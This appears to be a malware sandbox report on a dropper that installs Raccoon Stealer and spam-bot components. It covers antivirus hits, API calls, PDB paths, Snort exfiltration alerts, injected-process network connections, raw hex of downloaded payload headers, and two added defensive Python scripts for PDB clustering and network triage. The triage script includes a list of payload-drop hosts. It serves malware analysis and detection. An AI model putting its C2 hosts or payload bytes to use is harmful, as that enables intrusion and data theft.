Source: 30.2.77CC.exe.2170e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 43.3.evjgtzc.exe.620000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.6BA5.exe.7d0e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 43.2.evjgtzc.exe.660000.2.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 30.2.77CC.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 28.3.6BA5.exe.7f0000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 43.2.evjgtzc.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\6BA5.exe; Code function: 28_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\6BA5.exe; Code function: 28_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\6BA5.exe; Code function: 28_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\6BA5.exe; Code function: 28_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\6BA5.exe; Code function: 28_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\6BA5.exe; Unpacked PE file: 28.2.6BA5.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\77CC.exe; Unpacked PE file: 30.2.77CC.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe; Unpacked PE file: 43.2.evjgtzc.exe.400000.0.unpack
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49948 version: TLS 1.0
Uses 32bit PE files
Source: GNXG5XLBEH.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Tries to load missing DLLs
Source: C:\Users\user\AppData\Local\Temp\5BBC.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown; HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49810 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49876 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49878 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49893 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49914 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49932 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49936 version: TLS 1.2

Source: Binary string: profapi.pdb% source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbA source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.362609649.000000000549A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362887202.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.363451570.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362674770.0000000003636000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbK source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362658267.0000000003630000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.364317064.0000000003630000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdb source: GNXG5XLBEH.exe, GNXG5XLBEH.exe, 00000000.00000000.237874920.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000000.00000002.243174357.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000001.00000000.241196595.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000002.338879338.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000000.332813687.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000013.00000000.336956368.0000000000401000.00000020.00020000.sdmp
Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
Source: Binary string: =C:\tuxifazim\miwoto.pdbh source: 6BA5.exe, 0000001C.00000000.361905903.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.362658267.0000000003630000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.364317064.0000000003630000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 5BBC.exe, 00000015.00000000.344013914.0000000000413000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000002.412867900.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.411689423.0000000003750000.00000002.00020000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
Source: Binary string: /C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdbh source: GNXG5XLBEH.exe, 00000000.00000000.237874920.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000000.00000002.243174357.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000001.00000000.241196595.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000002.338879338.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000000.332813687.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000013.00000000.336956368.0000000000401000.00000020.00020000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: C:\sotos20-pacutejisuv\cohehadu24 nunadokosu\web-90\y.pdb source: 6B9B.exe, 6B9B.exe, 00000017.00000000.353267493.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 00000017.00000002.362522821.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 0000001A.00000000.358217888.0000000000401000.00000020.00020000.sdmp
Source: Binary string: cfgmgr32.pdbm source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: 1C:\wayevuwuku\98\caharesiyopa_p.pdbh source: 77CC.exe, 0000001E.00000000.367538577.0000000000401000.00000020.00020000.sdmp, evjgtzc.exe, 0000002B.00000000.396059268.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\wayevuwuku\98\caharesiyopa_p.pdb source: 77CC.exe, 0000001E.00000000.367538577.0000000000401000.00000020.00020000.sdmp, evjgtzc.exe, 0000002B.00000000.396059268.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\sotos20-pacutejisuv\cohehadu24 nunadokosu\web-90\y.pdbh source: 6B9B.exe, 00000017.00000000.353267493.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 00000017.00000002.362522821.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 0000001A.00000000.358217888.0000000000401000.00000020.00020000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: combase.pdbS source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001B.00000003.362887202.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.363451570.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362674770.0000000003636000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 5BBC.exe, 00000015.00000000.344013914.0000000000413000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000002.412867900.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.411689423.0000000003750000.00000002.00020000.sdmp
                      Source: Binary string: shlwapi.pdbG source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\tuxifazim\miwoto.pdb source: 6BA5.exe, 0000001C.00000000.361905903.0000000000401000.00000020.00020000.sdmp
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exe, Code function: 0_2_00419C64 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exe, Code function: 23_2_00419E04 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe, Code function: 28_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe, Code function: 28_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe, Code function: 28_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe, Code function: 28_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe, Code function: 28_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe, Code function: 28_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exe, Code function: 28_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
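                      The PDB paths listed above (for example C:\tuxifazim\miwoto.pdb and the same C:\siwuxidugo_...\cofugu.pdb in both GNXG5XLBEH.exe and its dropped copy ttfssdi) are a cheap pivot for clustering samples built by the same crypter. The script below is an added example written for this report, not tooling from Joe Sandbox: it extracts the path from the CodeView RSDS record in a PE and, for memory dumps where only a loose string scan is possible, anchors on the drive letter so that neighbouring bytes are not swallowed (which is why the report shows both "=C:\tuxifazim\miwoto.pdbh" and "C:\tuxifazim\miwoto.pdb"). All sample bytes are constructed in the code.

```python
import re
import struct

# CodeView 7.0 debug record as written by link.exe: 'RSDS', 16-byte GUID,
# 4-byte age, then the NUL-terminated PDB path.
RSDS_RECORD = re.compile(
    rb"RSDS(?P<guid>.{16})(?P<age>.{4})(?P<path>[^\x00]{1,260})\x00", re.DOTALL
)

# Loose scan for any drive-letter path ending in .pdb. Anchoring on the drive
# letter drops stray bytes in front of the path; the lazy quantifier stops at
# the first '.pdb', dropping whatever follows it.
PDB_PATH = re.compile(rb"[A-Za-z]:\\[^\x00\r\n]{1,250}?\.pdb", re.IGNORECASE)


def rsds_records(blob):
    """Return every RSDS record in blob as {guid, age, path}."""
    out = []
    for m in RSDS_RECORD.finditer(blob):
        g = m.group("guid")
        # First three GUID fields are little-endian; the rest is a byte string.
        d1, d2, d3 = struct.unpack_from("<IHH", g)
        guid = "%08X%04X%04X%s" % (d1, d2, d3, g[8:].hex().upper())
        age = struct.unpack("<I", m.group("age"))[0]
        out.append({"guid": guid, "age": age, "path": m.group("path").decode("latin-1")})
    return out


def pdb_paths(blob):
    """De-duplicated PDB paths from a loose string scan of arbitrary memory."""
    return sorted({m.group(0).decode("latin-1") for m in PDB_PATH.finditer(blob)})


def cluster_by_pdb(samples):
    """Map each PDB path to the set of sample names it occurs in."""
    clusters = {}
    for name, blob in samples.items():
        for path in pdb_paths(blob):
            clusters.setdefault(path, set()).add(name)
    return clusters


def build_rsds(guid, age, path):
    """Constructed RSDS record for testing; these are not bytes from the sample."""
    return b"RSDS" + guid + struct.pack("<I", age) + path.encode("latin-1") + b"\x00"


if __name__ == "__main__":
    # Constructed blobs: the dropped copy (ttfssdi) carries the same path as the
    # original GNXG5XLBEH.exe, as the report's strings show; stray bytes around
    # the path imitate what a string scan of a memory dump picks up.
    shared = build_rsds(bytes(range(16)), 1,
                        r"C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdb")
    samples = {
        "GNXG5XLBEH.exe": b"/" + shared,
        "ttfssdi": shared + b"h",
        "6BA5.exe": build_rsds(b"\xaa" * 16, 3, r"C:\tuxifazim\miwoto.pdb"),
    }
    for path, names in sorted(cluster_by_pdb(samples).items()):
        print(path, "->", sorted(names))
    for rec in rsds_records(samples["6BA5.exe"]):
        print("symbol key %s%X  %s" % (rec["guid"], rec["age"], rec["path"]))
```

                      The RSDS GUID and age together form the symbol-server key, so the same function also tells you whether two samples were linked from the same build directory or merely reuse the path string.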

                      Networking:

                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: Traffic, Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49900 -> 185.163.204.24:80
                      Source: Traffic, Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49929 -> 185.163.204.24:80
                      Source: Traffic, Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49929 -> 185.163.204.24:80
                      Source: Traffic, Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49900 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exe, Network Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exe, Domain query: patmushta.info
                      Source: C:\Windows\explorer.exe, Domain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exe, Network Connect: 188.166.28.199 80
                      Source: C:\Windows\SysWOW64\svchost.exe, Network Connect: 52.101.24.0 25
                      Source: C:\Windows\explorer.exe, Domain query: unicupload.top
                      Source: C:\Windows\explorer.exe, Network Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exe, Network Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exe, Domain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exe, Domain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\SysWOW64\svchost.exe, Domain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exe, Domain query: goo.su
                      Source: C:\Windows\explorer.exe, Domain query: transfer.sh
                      Source: C:\Windows\explorer.exe, Network Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exe, Domain query: data-host-coin-8.com
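                      Three things in the list above are worth turning into detection logic: explorer.exe and svchost.exe never originate outbound TCP on their own, so any such connection means injected code; the svchost.exe instance runs from SysWOW64 rather than System32; and the destinations include SMTP (52.101.24.0:25, the Microsoft mail-protection MX) and odd ports (187, 144). The triage function below is an added example written for this report, not Joe Sandbox code. The event records are constructed from the lines above and the field names are assumptions about whatever EDR or sandbox feed you have.

```python
import ipaddress
from dataclasses import dataclass

# Images that Windows itself launches and that do not originate outbound TCP
# on their own; a connection from one of them means code was injected.
SYSTEM_IMAGES = {
    r"c:\windows\explorer.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\syswow64\svchost.exe",
}
WEB_PORTS = {80, 443}
# Public file hosts / URL shorteners the report shows explorer.exe resolving.
PAYLOAD_HOSTS = {"cdn.discordapp.com", "transfer.sh", "goo.su"}


@dataclass(frozen=True)
class NetEvent:
    image: str          # full path of the connecting process
    dst: str            # IP address (Network Connect) or name (Domain query)
    dst_port: int = 0   # 0 for a pure DNS query


def triage(ev):
    """Return human-readable findings for one event; [] means nothing to see."""
    image = ev.image.lower()
    if image not in SYSTEM_IMAGES:
        return []
    notes = []
    if image.endswith(r"\syswow64\svchost.exe"):
        notes.append("32-bit svchost.exe from SysWOW64: the service controller starts "
                     "service hosts from System32, so this is rarely legitimate")
    try:
        ip = ipaddress.ip_address(ev.dst)
    except ValueError:
        ip = None
    if ip is None:  # a DNS query
        if ev.dst.lower() in PAYLOAD_HOSTS:
            notes.append("%s: public file host / shortener used as a payload drop" % ev.dst)
        else:
            notes.append("resolves %s; compare against the host's baseline" % ev.dst)
        return notes
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return notes  # LAN traffic (domain controller, proxy) is expected
    notes.append("outbound to %s:%d from a system image" % (ip, ev.dst_port))
    if ev.dst_port == 25:
        notes.append("direct SMTP: spam-bot behaviour (Tofsee indicator in this report)")
    elif ev.dst_port not in WEB_PORTS:
        notes.append("non-web port %d" % ev.dst_port)
    return notes


if __name__ == "__main__":
    # Constructed from the Network Connect / Domain query lines of the report.
    events = [
        NetEvent(r"C:\Windows\SysWOW64\svchost.exe", "94.142.143.116", 443),
        NetEvent(r"C:\Windows\SysWOW64\svchost.exe", "52.101.24.0", 25),
        NetEvent(r"C:\Windows\explorer.exe", "185.233.81.115", 187),
        NetEvent(r"C:\Windows\explorer.exe", "185.7.214.171", 144),
        NetEvent(r"C:\Windows\explorer.exe", "cdn.discordapp.com"),
        NetEvent(r"C:\Windows\explorer.exe", "transfer.sh"),
    ]
    for ev in events:
        for note in triage(ev):
            print("%-40s %s" % (ev.image, note))
```

                      Because explorer.exe and svchost.exe are allow-listed by many egress policies, the rule keys on the image path rather than on reputation of the destination; the destination only sharpens the severity.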
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknown, DNS query: name: api.telegram.org
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: c9d0e790b353537889bd47a364f5acff43c11f248.xyz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:14 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 
58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:18 GMTContent-Type: application/x-msdos-programContent-Length: 322048Connection: closeLast-Modified: Fri, 14 Jan 2022 18:09:01 GMTETag: "4ea00-5d58eb2938f45"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f1 34 a5 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ec 03 00 00 ac 11 00 00 00 00 00 e0 b9 01 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 15 00 00 04 00 00 8d 02 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 e7 03 00 50 00 00 00 00 00 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 fc 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 